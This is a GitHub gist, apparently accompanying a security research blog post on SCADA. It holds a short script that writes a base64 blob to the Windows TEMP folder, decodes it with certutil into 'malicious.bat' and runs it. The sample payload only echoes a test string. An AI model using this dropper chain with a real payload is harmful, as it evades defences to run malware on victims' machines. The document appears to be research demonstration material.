Last active
May 2, 2018 23:59
-
-
Save ssr-research/d6a7bacfc0dc14ffa7509c440f36bdd1 to your computer and use it in GitHub Desktop.
AttackIQ GameOn! Scada Blog Post
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Write out base64 encoded file to Windows TEMP directory | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo -----BEGIN CERTIFICATE----- > %TEMP%\\test.txt"); | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo ZWNobyBzZWN1cml0eXRlc3QgPiAlVEVNUCVcXG1hbGljaW91cy5leGU= >> %TEMP%\\test.txt"); | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo -----END CERTIFICATE----- >> %TEMP%\\test.txt"); | |
| //Decode base64 encoded file and output malicious batch file | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C certutil -decode %TEMP%\\test.txt %TEMP%\\malicious.bat"); | |
| //Execute malicious batch file | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C %TEMP%\\malicious.bat"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Added a file extension for syntax highlighting. Not actually a JS file.